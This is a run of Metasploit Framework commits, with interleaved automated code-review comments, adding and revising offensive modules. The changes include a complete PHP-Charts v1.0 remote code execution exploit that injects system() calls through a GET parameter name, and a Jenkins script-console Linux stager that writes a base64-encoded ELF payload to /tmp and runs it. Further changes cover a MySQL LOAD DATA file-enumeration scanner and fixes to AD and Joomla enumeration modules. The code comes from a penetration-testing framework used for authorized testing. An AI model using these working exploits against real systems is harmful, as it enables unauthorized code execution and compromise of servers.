wldap32.ldap_unbind(session_handle) + results_table = Rex::Ui::Text::Table.new( 'Header' => 'AD Computers', 'Indent' => 1, @@ -108,7 +101,7 @@ def run print_line results_table.to_s if datastore['STORE'] - stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_s) + stored_path = store_loot('ad.computers', 'text/plain', session, results_table.to_csv) print_status("Results saved to: #{stored_path}") end end @@ -124,15 +117,17 @@ def bind_default_ldap_server if session_handle == 0 print_error("Unable to connect to LDAP server") - return 0 + wldap32.ldap_unbind(session_handle) + return false end vprint_status ("Binding to LDAP server.") - bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE + bind = wldap32.ldap_bind_sA(session_handle, nil, nil, 0x0486)['return'] #LDAP_AUTH_NEGOTIATE 0x0486 if bind != 0 print_error("Unable to bind to LDAP server") - return 0 + wldap32.ldap_unbind(session_handle) + return false end return session_handle @@ -150,6 +145,13 @@ def query_ldap(session_handle, base, scope, filter, attributes) end search_count = wldap32.ldap_count_entries(session_handle, search['res'])['return'] + + if(search_count == 0) + print_error("No entries retrieved") + wldap32.ldap_msgfree(search['res']) + return + end + print_status("Entries retrieved: #{search_count}") vprint_status("Retrieving results...") 
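Review bot: In enum_ad_computers.rb, `run` indexes the first query straight away (`query_result[0]['attributes']`), but this commit also gives `query_ldap` bare `return` paths (the `@@ -150,6 +145,13 @@` and `@@ -163,15 +165,22 @@` hunks), so an empty search now ends in a NoMethodError on nil instead of a clean exit. The second call has the mirror problem: when `query_ldap` has already called `ldap_unbind` in its entry-failure branch, `run` unbinds the same handle again. Letting `run` own the handle, with a nil guard after each query and a single unbind in an `ensure`, and removing the `ldap_unbind` call from `query_ldap`, makes every exit path release it exactly once. `run` continues past the end of this hunk.

```ruby
return false unless session_handle

begin
  # … unchanged: "Querying default naming context" status and first query_ldap call …
  return false unless query_result
  # … unchanged: naming-context lookup, ATTRIBS split, second query_ldap call …
  return false unless results
ensure
  print_status("Unbinding from LDAP service.")
  wldap32.ldap_unbind(session_handle)
end
```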
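Review bot: In `bind_default_ldap_server`, the new branch for `session_handle == 0` calls `wldap32.ldap_unbind(session_handle)` on the null handle that was just reported as a failed connection, so there is nothing to release and the call only hands NULL to the LDAP library. Drop that line and keep `return false`; the unbind added to the bind-failure branch below, where the handle is valid, is the one that is needed. The comment `#LDAP_AUTH_NEGOTIATE 0x0486` repeats the literal beside it; a named constant such as `LDAP_AUTH_NEGOTIATE = 0x0486` would document it once. The first lines of the method are outside this hunk.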
@@ -163,15 +165,22 @@ def query_ldap(session_handle, base, scope, filter, attributes) max_search = [datastore['MAX_SEARCH'], search_count].min end - # user definied limit on entries to search? - for i in 0..(max_search-1) + 0.upto(max_search - 1) do |i| print '.' - if i==0 - entries[i] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] + if(i==0) + entries[0] = wldap32.ldap_first_entry(session_handle, search['res'])['return'] else entries[i] = wldap32.ldap_next_entry(session_handle, entries[i-1])['return'] end + + if(entries[i] == 0) + print_error("Failed to get entry.") + wldap32.ldap_unbind(session_handle) + wldap32.ldap_msgfree(search['res']) + return + end + vprint_status("Entry #{i}: #{entries[i]}") attribute_results = [] @@ -191,7 +200,7 @@ def query_ldap(session_handle, base, scope, filter, attributes) if count < 1 vprint_error("Bad Value List") else - for j in 0..(count-1) + 0.upto(count - 1) do |j| p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0] vprint_status "p_value: 0x#{p_value.to_s(16)}" value = read_value(p_value) @@ -209,6 +218,7 @@ def query_ldap(session_handle, base, scope, filter, attributes) if pp_value != 0 vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) + # wldap32.ldap_memfree(attr) No need to free attributes as these are hardcoded end attribute_results << {"name" => attr, "values" => value_results} From dcaf2abc53b92537236c2ade043f198c966b4099 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Sun, 20 Jan 2013 00:22:30 +0000 Subject: [PATCH 070/421] Better feedback for x86 --- modules/post/windows/gather/enum_ad_computers.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 3c923875a9cc..7909ee8966ef 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb 
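Review bot: The value loop touched by the `@@ -191,7 +200,7 @@` hunk still reads each element with `client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0]`, a 4-byte stride and a 32-bit unpack, while the same commit changes `run` to reject every session except `session.platform == "x64/win64"`. If the code runs in a 64-bit process, the array returned by `ldap_get_values` would presumably hold 8-byte pointers and this read would yield truncated addresses; the handle parameters declared as `DWORD` raise the same question. This should be confirmed against the linked issue, and the element size either derived from the session architecture or recorded with a comment such as `# NOTE: assumes 4-byte pointers in the value array`. The loop body continues outside the hunk.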
@@ -52,7 +52,7 @@ def read_value(addr) def run unless session.platform == "x64/win64" - print_error("Does not work in x86 see: http://dev.metasploit.com/redmine/issues/7639"); + print_error("Does not work in x86 meterpreter (use x64 instead) see: http://dev.metasploit.com/redmine/issues/7639"); return end From aed71f8446b9771dbf3b54af3170773cdd1f6e10 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 20 Jan 2013 13:42:02 +0100 Subject: [PATCH 071/421] linux stager plus little cleanup --- .../multi/http/jenkins_script_console.rb | 45 +++++++++++++++++-- 1 file changed, 41 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 1033999726bb..2d4eac4dce22 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -12,6 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -36,8 +37,9 @@ def initialize(info = {}) ], 'Targets' => [ - ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], - ['Unix', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}], + ['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win'}], + ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }], + ['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}] ], 'DisclosureDate' => 'Jan 18 2013', 'DefaultTarget' => 0)) @@ -46,7 +48,7 @@ def initialize(info = {}) [ OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]), - OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]), + OptString.new('TARGETURI', [ true, 'The path to jenkins', '/jenkins/' ]), ], self.class) end 
@@ -62,6 +64,13 @@ def check end end + def on_new_session(client) + if not @to_delete.nil? + print_warning("Deleting #{@to_delete} payload file") + execute_command("rm #{@to_delete}") + end + end + def http_send_command(cmd, opts = {}) request_parameters = { 'method' => 'POST', @@ -100,9 +109,35 @@ def java_craft_runtime_exec(cmd) end def execute_command(cmd, opts = {}) + vprint_status("Attempting to execute: #{cmd}") http_send_command("#{cmd}") end + def linux_stager + cmds = "echo LINE | tee FILE" + exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) + base64 = Rex::Text.encode_base64(exe) + base64.gsub!(/\=/, "\\u003d") + file = rand_text_alphanumeric(4+rand(4)) + + execute_command("touch /tmp/#{file}.b64") + cmds.gsub!(/FILE/, "/tmp/" + file + ".b64") + base64.each_line do |line| + line.chomp! + cmd = cmds + cmd.gsub!(/LINE/, line) + execute_command(cmds) + end + + execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}") + execute_command("chmod +x /tmp/#{file}") + execute_command("rm /tmp/#{file}.b64") + + execute_command("/tmp/#{file}") + @to_delete = "/tmp/#{file}" + end + + def exploit @uri = target_uri @uri.path = normalize_uri(@uri.path) @@ -138,10 +173,12 @@ def exploit when 'win' print_status("#{rhost}:#{rport} - Sending VBS stager...") execute_cmdstager({:linemax => 2049}) - when 'unix' print_status("#{rhost}:#{rport} - Sending payload...") http_send_command("#{payload.encoded}") + when 'linux' + print_status("#{rhost}:#{rport} - Sending Linux stager...") + linux_stager end handler From 6ae72e4d6361f8e00ed674709587bd9bd6764539 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 20 Jan 2013 23:51:17 +1030 Subject: [PATCH 072/421] Add PHP-Charts v1.0 PHP Code Execution Exploit --- .../exploits/multi/http/php_charts_exec.rb | 117 ++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 modules/exploits/multi/http/php_charts_exec.rb 
diff --git a/modules/exploits/multi/http/php_charts_exec.rb b/modules/exploits/multi/http/php_charts_exec.rb new file mode 100644 index 000000000000..14591ae3313d --- /dev/null +++ b/modules/exploits/multi/http/php_charts_exec.rb 
@@ -0,0 +1,117 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "PHP-Charts v1.0 PHP Code Execution Vulnerability", + 'Description' => %q{ + This module exploits a PHP code execution vulnerability in php-Charts + version 1.0 which could be abused to allow users to execute arbitrary + PHP code under the context of the webserver user. The 'url.php' script + calls eval() with user controlled data from any HTTP GET parameter name. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkaStep', # Discovery + 'Brendan Coles ' # msf exploit + ], + 'References' => + [ + ['URL', 'http://www.exploit-db.com/exploits/24201/'], + ], + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x22", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python', + } + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 18 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']), + ], self.class) + end + + def check + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + peer = "#{rhost}:#{rport}" + fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) + code = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}")) + rand_key_value = rand_text_alphanumeric(rand(10)+6) + + # send check + print_status("#{peer} - Sending check") + begin + res = 
send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" + }) + + if res and res.body =~ /#{fingerprint}/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def exploit + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + @peer = "#{rhost}:#{rport}" + code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&")) + rand_key_value = rand_text_alphanumeric(rand(10)+6) + + # send payload + print_status("#{@peer} - Sending payload (#{code.length} bytes)") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" + }) + if res and res.code == 500 + print_good("#{@peer} - Payload sent successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end +end From f975a42571954b7291c593db0d28a0abce320292 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 21 Jan 2013 02:10:48 +1030 Subject: [PATCH 073/421] move and update php_charts_exec metadata --- modules/exploits/{multi/http => unix/webapp}/php_charts_exec.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/{multi/http => unix/webapp}/php_charts_exec.rb (100%) diff --git a/modules/exploits/multi/http/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb similarity index 100% rename from modules/exploits/multi/http/php_charts_exec.rb rename to modules/exploits/unix/webapp/php_charts_exec.rb From dc318c5aed5f4c76a01a1d815f8a4dceaa842e36 Mon Sep 17 00:00:00 2001 
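Review bot: In php_charts_exec.rb, `check` and `exploit` each rebuild the same base path (`base = target_uri.path` followed by `base << '/' if base[-1, 1] != '/'`) and the same request URI string, and one keeps the peer in a local `peer` while the other uses `@peer`. Moving the path handling into one private helper and using a single form for the peer string would leave one place to change; the jenkins module on this page goes through `normalize_uri` for the same job. In `exploit`, the branch that treats `res.code == 500` as success deserves a short why-comment, since a 500 normally signals failure and the reason is not visible from the code.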
From: bcoles Date: Mon, 21 Jan 2013 02:12:42 +1030 Subject: [PATCH 074/421] update php_charts_exec metadata --- modules/exploits/unix/webapp/php_charts_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 14591ae3313d..59be0c3f89f8 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -24,12 +24,13 @@ def initialize(info={}) 'License' => MSF_LICENSE, 'Author' => [ - 'AkaStep', # Discovery + 'AkaStep', # Discovery and PoC 'Brendan Coles ' # msf exploit ], 'References' => [ - ['URL', 'http://www.exploit-db.com/exploits/24201/'], + ['EDB', '24201'], + ['OSVDB', '89334'], ], 'Payload' => { From 9769efbf01c58b2bc9c929e96b9f21d0297d3e89 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 20 Jan 2013 17:38:37 +0100 Subject: [PATCH 075/421] references and date updated --- modules/exploits/unix/webapp/php_charts_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/php_charts_exec.rb b/modules/exploits/unix/webapp/php_charts_exec.rb index 59be0c3f89f8..50159d7bc596 100644 --- a/modules/exploits/unix/webapp/php_charts_exec.rb +++ b/modules/exploits/unix/webapp/php_charts_exec.rb @@ -29,8 +29,9 @@ def initialize(info={}) ], 'References' => [ - ['EDB', '24201'], ['OSVDB', '89334'], + ['BID', '57448'], + ['EDB', '24201'] ], 'Payload' => { @@ -52,7 +53,7 @@ def initialize(info={}) ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, - 'DisclosureDate' => "Jan 18 2013", + 'DisclosureDate' => "Jan 16 2013", 'DefaultTarget' => 0)) register_options( From 967c04e72784b36f9405462032e52377ed03e8bc Mon Sep 17 00:00:00 2001 
From: jvazquez-r7 Date: Sun, 20 Jan 2013 19:54:24 +0100 Subject: [PATCH 076/421] finally it doesn't use FileDropper atm --- modules/exploits/multi/http/jenkins_script_console.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index 2d4eac4dce22..7d94d5640b87 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS - include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, From 23d1eb7a802e2b55e28b0bc95082daa8786d35e9 Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sat, 19 Jan 2013 22:48:00 +0000 Subject: [PATCH 077/421] File/dir brute forcer using MySQL --- lib/msf/core/exploit/mysql.rb | 7 ++ .../scanner/mysql/mysql_file_enum.rb | 95 +++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 modules/auxiliary/scanner/mysql/mysql_file_enum.rb diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index b86e51e9a955..86ed7e856a06 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -87,6 +87,13 @@ def mysql_login_datastore return res end + # This function does not handle any errors, if you use this + # make sure you handle the errors yourself + def mysql_query_no_handle(sql) + res = @mysql_handle.query(sql) + res + end + def mysql_query(sql) begin res = @mysql_handle.query(sql) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb new file mode 100644 index 000000000000..abdc7229487a --- /dev/null +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb 
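Review bot: In lib/msf/core/exploit/mysql.rb, the name `mysql_query_no_handle` reads as "query without a handle" although the method uses `@mysql_handle`; what it means is "no error handling", which only the comment explains. The comment should also say which exceptions callers must rescue (the new caller on this page rescues `::RbMysql::Error` and `Rex::ConnectionTimeout`) and that the method presumably fails with NoMethodError if called before a successful login leaves `@mysql_handle` set. The temporary is not needed, so the body can be the single line `@mysql_handle.query(sql)`. `mysql_query` below it continues outside the hunk.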
@@ -0,0 +1,95 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'yaml' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::MYSQL + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'MYSQL File/Directory Enumerator', + 'Description' => %Q{ + Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references. + }, + 'Version' => '$Revision $', + 'Author' => [ 'Robin Wood ' ], + 'References' => [ + [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], + [ 'URL', 'http://www.digininja.org/projects/mysql_file_enum.php' ] + ], + 'License' => MSF_LICENSE + ) + + register_options([ + OptString.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), + OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'test' ]), + OptString.new('TABLE_NAME', [ true, "Name of table to use", Rex::Text.rand_text_alpha(8) ]), + OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) + ]) + + end + + def run_host(ip) + print_status("Checking " + ip) + # Should check this before running at all, this is run on a + # per-host level + if not ::File.exists?(datastore['FILE_LIST']) + print_error "File list does not exist!" 
+ return + end + + if (not mysql_login_datastore) + return + end + + mysql_query("USE " + datastore['DATABASE_NAME']) + res = mysql_query("SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA = '" + datastore['DATABASE_NAME'] + "' AND TABLE_NAME = '" + datastore['TABLE_NAME'] + "';") + table_exists = (res.size == 1) + + if !table_exists + print_status("Table doesn't exist so creating it") + mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") + end + + file = File.new(datastore['FILE_LIST'], "r") + file.each_line do |line| + check_dir(line.chomp) + end + + if !table_exists + print_status("Cleaning up the temp table") + mysql_query("DROP TABLE " + datastore['TABLE_NAME']) + end + end + + def check_dir dir + begin + res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE brute") + rescue ::RbMysql::TextfileNotReadable + print_good(dir + " is a directory and exists") + rescue ::RbMysql::ServerError + print_warning(dir + " does not exist") + rescue ::RbMysql::Error => e + print_error("MySQL Error: #{e.class} #{e.to_s}") + return + rescue Rex::ConnectionTimeout => e + print_error("Timeout: #{e.message}") + return + else + print_good(dir + " is a file and exists") + end + #puts res.inspect + + return + end + +end From fce58ad96db8d217bc8b92a5d61030a1bb46fe97 Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sat, 19 Jan 2013 23:41:38 +0000 Subject: [PATCH 078/421] Fixed msftidy stuff --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index abdc7229487a..e12933bab23a 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb 
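Review bot: In mysql_file_enum.rb, `run_host` opens the word list with `File.new(datastore['FILE_LIST'], "r")` and never closes it, and the `DROP TABLE` cleanup runs only if the loop finishes normally, so an unexpected exception leaves the scratch table behind in the server being tested. `File.foreach(datastore['FILE_LIST']) { |line| check_dir(line.chomp) }` closes the file itself, and putting the loop in `begin … ensure` with the drop in the `ensure` part keeps the cleanup on every path. The statements are also built by concatenating `DATABASE_NAME`, `TABLE_NAME` and each path into the SQL text, so a list entry containing `'` changes the statement; the path should be escaped before it is interpolated. `require 'yaml'` and the assigned-but-unused `res` in `check_dir` can go.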
@@ -20,7 +20,6 @@ def initialize 'Description' => %Q{ Enumerate files and directories using the MySQL load_file feature, for more information see the URL in the references. }, - 'Version' => '$Revision $', 'Author' => [ 'Robin Wood ' ], 'References' => [ [ 'URL', 'http://pauldotcom.com/2013/01/mysql-file-system-enumeration.html' ], From ebb0635e0acee6d2ea768b08e15810a24e27942b Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 00:02:07 +0000 Subject: [PATCH 079/421] stopped using fixed table name --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index e12933bab23a..20efbd61ac7b 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -72,7 +72,7 @@ def run_host(ip) def check_dir dir begin - res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE brute") + res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable print_good(dir + " is a directory and exists") rescue ::RbMysql::ServerError From 6da4b72d8505449a1e5b78bdcae693cebfdc1057 Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 00:12:38 +0000 Subject: [PATCH 080/421] added a warning and using optpath --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 20efbd61ac7b..ce85701e1fdb 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb 
@@ -29,9 +29,9 @@ def initialize ) register_options([ - OptString.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), + OptPath.new('FILE_LIST', [ true, "List of directories to enumerate", '' ]), OptString.new('DATABASE_NAME', [ true, "Name of database to use", 'test' ]), - OptString.new('TABLE_NAME', [ true, "Name of table to use", Rex::Text.rand_text_alpha(8) ]), + OptString.new('TABLE_NAME', [ true, "Name of table to use - Warning, if the table already exists its contents will be corrupted", Rex::Text.rand_text_alpha(8) ]), OptString.new('USERNAME', [ true, 'The username to authenticate as', "root" ]) ]) From e7604f80b203fd62b1864fbdb78b0602c204554a Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 00:13:42 +0000 Subject: [PATCH 081/421] added a warning and using optpath --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 6 ------ 1 file changed, 6 deletions(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index ce85701e1fdb..d11e528c0a79 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -39,12 +39,6 @@ def initialize def run_host(ip) print_status("Checking " + ip) - # Should check this before running at all, this is run on a - # per-host level - if not ::File.exists?(datastore['FILE_LIST']) - print_error "File list does not exist!" - return - end if (not mysql_login_datastore) return From 4d5a7a3d4dc88c9e1bb119e2dfcc697ae72588bd Mon Sep 17 00:00:00 2001 From: Robin Wood Date: Sun, 20 Jan 2013 21:32:02 +0000 Subject: [PATCH 082/421] Brute force directory and file names with MySQL --- modules/auxiliary/scanner/mysql/mysql_file_enum.rb | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index d11e528c0a79..d7b30b5da6fb 100644 
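Review bot: The warning added to the `TABLE_NAME` description is the only protection an existing table gets: the text says its contents will be corrupted, but nothing stops the run. run_host already computes `table_exists` (outside this hunk), so it could stop there with `print_error("#{datastore['TABLE_NAME']} already exists, choose another TABLE_NAME")` followed by `return`. That keeps a mistyped or reused name from damaging data the module did not create.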
--- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -44,7 +44,16 @@ def run_host(ip) return end - mysql_query("USE " + datastore['DATABASE_NAME']) + begin + mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) + rescue ::RbMysql::Error => e + print_error("MySQL Error: #{e.class} #{e.to_s}") + return + rescue Rex::ConnectionTimeout => e + print_error("Timeout: #{e.message}") + return + end + res = mysql_query("SELECT * FROM information_schema.TABLES WHERE TABLE_SCHEMA = '" + datastore['DATABASE_NAME'] + "' AND TABLE_NAME = '" + datastore['TABLE_NAME'] + "';") table_exists = (res.size == 1) From 5cfe58e8d508d2889deb808c9e0c9c3f2c4a4a75 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Sun, 20 Jan 2013 22:33:04 -0500 Subject: [PATCH 083/421] General code review and corrections --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 81 ++++++++++--------- 1 file changed, 43 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index c8cbfbae27f9..37bfc3d17309 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -20,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Joomla Scanner', - 'Version' => '$Revision: 14774 $', 'Description' => %q{ - This module scans the Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE @@ -40,7 +39,7 @@ def initialize ], self.class) end - def osfingerprint(response) + def osfingerprint (response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" 
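Review bot: The `USE` statement now has explicit error handling, but the `SELECT` on the following line still goes through `mysql_query` and its result is dereferenced at once with `res.size`. If `mysql_query` returns nil when a query fails (its rescue branch is not visible in this patch, so this is an assumption), that line raises NoMethodError. Adding `return if res.nil?` before `table_exists = (res.size == 1)` keeps the failure path consistent with the new rescue block. run_host continues outside the hunk.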
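Review bot: The signature becomes `def osfingerprint (response)`, with a space between the method name and the opening parenthesis; the usual Ruby convention, and the form the file used before, is `def osfingerprint(response)`. The same spacing is introduced for `fingerprint`, `run_host`, `check_app`, `scan_pages` and `plugin_search` in the later hunks of this file. osfingerprint's body continues outside the hunk.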
@@ -51,8 +50,9 @@ def osfingerprint(response) end end return os - end - def fingerprint(response, app) + end + + def fingerprint (response, app) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 @@ -87,7 +87,7 @@ def fingerprint(response, app) return out end - def run_host(ip) + def run_host (ip) tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' @@ -102,12 +102,12 @@ def run_host(ip) apps.each do |app| break if check_app(tpath,app,ip) end - print_status("Scanning for interesting pages") + print_status("Scanning #{ip} for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning for plugins") + print_status("Scanning #{ip} for plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', @@ -118,12 +118,13 @@ def run_host(ip) papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end - end - end - def check_app(tpath, app, ip) + + end + + def check_app (tpath, app, ip) res = send_request_cgi({ - 'uri' => tpath+app, + 'uri' => "#{datastore['PATH']}" << app, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -159,13 +160,14 @@ def check_app(tpath, app, ip) end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def scan_pages(tpath,iapp, ip) + + def scan_pages (tpath, iapp, ip) res = send_request_cgi({ - 'uri' => tpath+iapp, + 'uri' => "#{datastore['PATH']}" << iapp, 'method' => 